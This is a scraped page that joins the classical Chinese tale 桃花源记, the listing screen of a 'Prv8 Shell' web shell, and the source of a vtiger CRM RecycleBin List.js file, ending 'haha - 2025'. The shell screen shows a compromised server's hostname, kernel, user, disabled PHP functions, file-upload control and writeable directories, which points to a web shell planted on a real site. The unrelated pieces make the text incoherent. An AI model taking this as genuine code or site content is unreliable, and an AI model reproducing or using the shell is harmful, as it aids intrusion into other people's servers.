晋太元中,武陵人捕鱼为业。缘溪行,忘路之远近。忽逢桃花林,夹岸数百步,中无杂树,芳草鲜美,落英缤纷。渔人甚异之,复前行,欲穷其林。   林尽水源,便得一山,山有小口,仿佛若有光。便舍船,从口入。初极狭,才通人。复行数十步,豁然开朗。土地平旷,屋舍俨然,有良田、美池、桑竹之属。阡陌交通,鸡犬相闻。其中往来种作,男女衣着,悉如外人。黄发垂髫,并怡然自乐。   见渔人,乃大惊,问所从来。具答之。便要还家,设酒杀鸡作食。村中闻有此人,咸来问讯。自云先世避秦时乱,率妻子邑人来此绝境,不复出焉,遂与外人间隔。问今是何世,乃不知有汉,无论魏晋。此人一一为具言所闻,皆叹惋。余人各复延至其家,皆出酒食。停数日,辞去。此中人语云:“不足为外人道也。”(间隔 一作:隔绝)   既出,得其船,便扶向路,处处志之。及郡下,诣太守,说如此。太守即遣人随其往,寻向所志,遂迷,不复得路。   南阳刘子骥,高尚士也,闻之,欣然规往。未果,寻病终。后遂无问津者。 .
Prv8 Shell
Server : Apache
System : Linux srv.rainic.com 4.18.0-553.47.1.el8_10.x86_64 #1 SMP Wed Apr 2 05:45:37 EDT 2025 x86_64
User : rainic ( 1014)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
Directory :  /home/akaindir/public_html/crm/pkg/vtiger/modules/RecycleBin/templates/resources/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/akaindir/public_html/crm/pkg/vtiger/modules/RecycleBin/templates/resources/List.js
/*+***********************************************************************************
 * The contents of this file are subject to the vtiger CRM Public License Version 1.0
 * ("License"); You may not use this file except in compliance with the License
 * The Original Code is:  vtiger CRM Open Source
 * The Initial Developer of the Original Code is vtiger.
 * Portions created by vtiger are Copyright (C) vtiger.
 * All Rights Reserved.
 *************************************************************************************/

Vtiger_List_Js("RecycleBin_List_Js", {
    emptyRecycleBin: function(url) {
        var message = app.vtranslate('JS_MSG_EMPTY_RB_CONFIRMATION');
        Vtiger_Helper_Js.showConfirmationBox({'message': message}).then(
                function(e) {
                    var deleteURL = url + '&mode=emptyRecycleBin';
                    var instance = new RecycleBin_List_Js();
                    AppConnector.request(deleteURL).then(
                            function(data) {
                                if (data) {
                                    //fix for EmptyRecycle bin 
                                    jQuery(".clearRecycleBin").attr('disabled','disabled'); 
                                    instance.recycleBinActionPostOperations(data);
                                }
                            }
                    );
                },
                function(error, err) {
                })
    },
    deleteRecords: function(url) {
        var listInstance = Vtiger_List_Js.getInstance();
        var validationResult = listInstance.checkListRecordSelected();
        if (validationResult != true) {
            var selectedIds = listInstance.readSelectedIds(true);
            var cvId = listInstance.getCurrentCvId();
            var message = app.vtranslate('LBL_MASS_DELETE_CONFIRMATION');
            Vtiger_Helper_Js.showConfirmationBox({'message': message}).then(
                    function(e) {
                        var sourceModule = jQuery('#customFilter').val();
                        var deleteURL = url + '&viewname=' + cvId + '&selected_ids=' + selectedIds + '&mode=deleteRecords&sourceModule=' + sourceModule;
                        var deleteMessage = app.vtranslate('JS_RECORDS_ARE_GETTING_DELETED');
                        var progressIndicatorElement = jQuery.progressIndicator({
                            'message': deleteMessage,
                            'position': 'html',
                            'blockInfo': {
                                'enabled': true
                            }
                        });
                        AppConnector.request(deleteURL).then(
                                function(data) {
                                    if (data) {
                                        progressIndicatorElement.progressIndicator({
                                            'mode': 'hide'
                                        })
                                        var instance = new RecycleBin_List_Js();
                                        instance.recycleBinActionPostOperations(data);
                                    }
                                }
                        );
                    },
                    function(error, err) {
                    })
        } else {
            listInstance.noRecordSelectedAlert();
        }

    },
    restoreRecords: function(url) {
        var listInstance = Vtiger_List_Js.getInstance();
        var validationResult = listInstance.checkListRecordSelected();
        if (validationResult != true) {
            var selectedIds = listInstance.readSelectedIds(true);
            var excludedIds = listInstance.readExcludedIds(true);
            var cvId = listInstance.getCurrentCvId();
            var message = app.vtranslate('JS_LBL_RESTORE_RECORDS_CONFIRMATION');
            Vtiger_Helper_Js.showConfirmationBox({'message': message}).then(
                    function(e) {
                        var sourceModule = jQuery('#customFilter').val();
                        var deleteURL = url + '&viewname=' + cvId + '&selected_ids=' + selectedIds + '&excluded_ids=' + excludedIds + '&mode=restoreRecords&sourceModule=' + sourceModule;
                        var restoreMessage = app.vtranslate('JS_RESTORING_RECORDS');
                        var progressIndicatorElement = jQuery.progressIndicator({
                            'message': restoreMessage,
                            'position': 'html',
                            'blockInfo': {
                                'enabled': true
                            }
                        });
                        AppConnector.request(deleteURL).then(
                                function(data) {
                                    if (data) {
                                        progressIndicatorElement.progressIndicator({
                                            'mode': 'hide'
                                        })
                                        var instance = new RecycleBin_List_Js();
                                        instance.recycleBinActionPostOperations(data);
                                    }
                                }
                        );
                    },
                    function(error, err) {
                    })
        } else {
            listInstance.noRecordSelectedAlert();
        }
    },
    
    /**
     * Function to convert id into json string
     * @param <integer> id
     * @return <string> json string
     */
    convertToJsonString : function(id) {
        var jsonObject = [];
        jsonObject.push(id);
        return JSON.stringify(jsonObject);
    },

       
    /**
     * Function to delete a record
     */
    deleteRecord : function(recordId) {
        var recordId = RecycleBin_List_Js.convertToJsonString(recordId);
		var listInstance = Vtiger_List_Js.getInstance();
		var message = app.vtranslate('LBL_DELETE_CONFIRMATION');
        var sourceModule = jQuery('#customFilter').val();
        var cvId = listInstance.getCurrentCvId();
		Vtiger_Helper_Js.showConfirmationBox({'message' : message}).then(
			function(e) {
				var module = app.getModuleName();
				var postData = {
					"module": module,
                    "viewname": cvId,
                    "selected_ids": recordId,
					"action": "RecycleBinAjax",
					"sourceModule": sourceModule,
                    "mode": "deleteRecords"
				}
				var deleteMessage = app.vtranslate('JS_RECORD_GETTING_DELETED');
				var progressIndicatorElement = jQuery.progressIndicator({
					'message' : deleteMessage,
					'position' : 'html',
					'blockInfo' : {
						'enabled' : true
					}
				});
				AppConnector.request(postData).then(
                    function(data) {
                        if(data){
                            progressIndicatorElement.progressIndicator({
                                'mode' : 'hide'
                            })
                            var instance = new RecycleBin_List_Js();
                            instance.recycleBinActionPostOperations(data);
                        }
                    }
                );
            },
            function(error, err){
            });
	},
    
    /**
    * Function to restore a record
    */
    restoreRecord : function(recordId){
        var recordId = RecycleBin_List_Js.convertToJsonString(recordId);
		var listInstance = Vtiger_List_Js.getInstance();
        var sourceModule = jQuery('#customFilter').val();
        var cvId = listInstance.getCurrentCvId();
        var message = app.vtranslate('JS_LBL_RESTORE_RECORD_CONFIRMATION');
        Vtiger_Helper_Js.showConfirmationBox({'message' : message}).then(
            function(e) {
                var module = app.getModuleName();
                var postData = {
                    "module": module,
                    "action": "RecycleBinAjax",
                    "viewname": cvId,
                    "selected_ids": recordId,
                    "mode": "restoreRecords",
                    "sourceModule": sourceModule
                }
                var restoreMessage = app.vtranslate('JS_RESTORING_RECORD');
                var progressIndicatorElement = jQuery.progressIndicator({
                    'message' : restoreMessage,
                    'position' : 'html',
                    'blockInfo' : {
                        'enabled' : true
                    }
                });
                AppConnector.request(postData).then(
                    function(data) {
                        if(data){
                            progressIndicatorElement.progressIndicator({
                                'mode' : 'hide'
                            })
                            var instance = new RecycleBin_List_Js();
                            instance.recycleBinActionPostOperations(data);
                        }
                    }
                );
            },
            function(error, err){
            });
	}

}, { 
    
    
        //Fix for empty Recycle bin
        //Change Button State ("Enable or Dissable") 
       ListViewPostOperation: function() {
             if(parseInt(jQuery('#deletedRecordsTotalCount').val()) == 0){ 
                jQuery(".clearRecycleBin").attr('disabled','disabled'); 
            }else{ 
                    jQuery(".clearRecycleBin").removeAttr('disabled'); 
            }
       },
       
	getDefaultParams : function() {
		var pageNumber = jQuery('#pageNumber').val();
		var module = app.getModuleName();
		var parent = app.getParentModuleName();
		var cvId = this.getCurrentCvId();
		var orderBy = jQuery('#orderBy').val();
		var sortOrder = jQuery("#sortOrder").val();
		var params = {
			'module': module,
			'parent' : parent,
			'page' : pageNumber,
			'view' : "List",
			'orderby' : orderBy,
			'sortorder' : sortOrder,
			'sourceModule' : jQuery('#customFilter').val()
		}
		return params;
	},
	/*
	 * Function to perform the operations after the Empty RecycleBin
	 */
	recycleBinActionPostOperations : function(data){
		jQuery('#recordsCount').val('');
		jQuery('#totalPageCount').text('');
		var thisInstance = this;
		var cvId = this.getCurrentCvId();
		if(data.success){
			var module = app.getModuleName();
			var params = thisInstance.getDefaultParams();
			AppConnector.request(params).then(
				function(data) {
					app.hideModalWindow();
					var listViewContainer = thisInstance.getListViewContentContainer();
					listViewContainer.html(data);
					jQuery('#deSelectAllMsg').trigger('click');
                                        thisInstance.ListViewPostOperation();
					thisInstance.calculatePages().then(function(){
						thisInstance.updatePagination();					
					});
				});
		} else {
			app.hideModalWindow();
			var params = {
				title : app.vtranslate('JS_LBL_PERMISSION'),
				text : data.error.message
			}
			Vtiger_Helper_Js.showPnotify(params);
		}
	},
	
	getRecordsCount : function(){
		var aDeferred = jQuery.Deferred();
		var recordCountVal = jQuery("#recordsCount").val();
		if(recordCountVal != ''){
			aDeferred.resolve(recordCountVal);
		} else {
			var count = '';
			var module = app.getModuleName();
			var sourceModule = jQuery('#customFilter').val();
			var postData = {
				"module": module,
				"sourceModule": sourceModule,
				"view": "ListAjax",
				"mode": "getRecordsCount"
			}

			AppConnector.request(postData).then(
				function(data) {
					var response = JSON.parse(data);
					jQuery("#recordsCount").val(response['result']['count']);
					count =  response['result']['count'];
					aDeferred.resolve(count);
				},
				function(error,err){

				}
			);
		}

		return aDeferred.promise();
	},
	
	/**
	 * Function to get Page Jump Params
	 */
	getPageJumpParams : function(){
		var module = app.getModuleName();
		var cvId = this.getCurrentCvId();
		var pageCountParams = {
			'module' : module,
			'view' : "ListAjax",
			'mode' : "getPageCount",
			'sourceModule': jQuery('#sourceModule').val()
		}
		return pageCountParams;
	},
    
    /*
	 * Function to register the list view delete record click event
	 */
	registerDeleteRecordClickEvent: function(){
		var thisInstance = this;
		var listViewContentDiv = this.getListViewContentContainer();
		listViewContentDiv.on('click','.deleteRecordButton',function(e){
			var elem = jQuery(e.currentTarget);
			var recordId = elem.closest('tr').data('id');
			RecycleBin_List_Js.deleteRecord(recordId);
			e.stopPropagation();
		});
	}, 
    
     /*
	 * Function to register the list view restore record click event
	 */
	registerRestoreRecordClickEvent: function(){
		var thisInstance = this;
		var listViewContentDiv = this.getListViewContentContainer();
		listViewContentDiv.on('click','.restoreRecordButton',function(e){
			var elem = jQuery(e.currentTarget);
			var recordId = elem.closest('tr').data('id');
			RecycleBin_List_Js.restoreRecord(recordId);
			e.stopPropagation();
		});
	},
    
    registerEvents : function() {
        this._super();
        this.registerRestoreRecordClickEvent();
    }
});

haha - 2025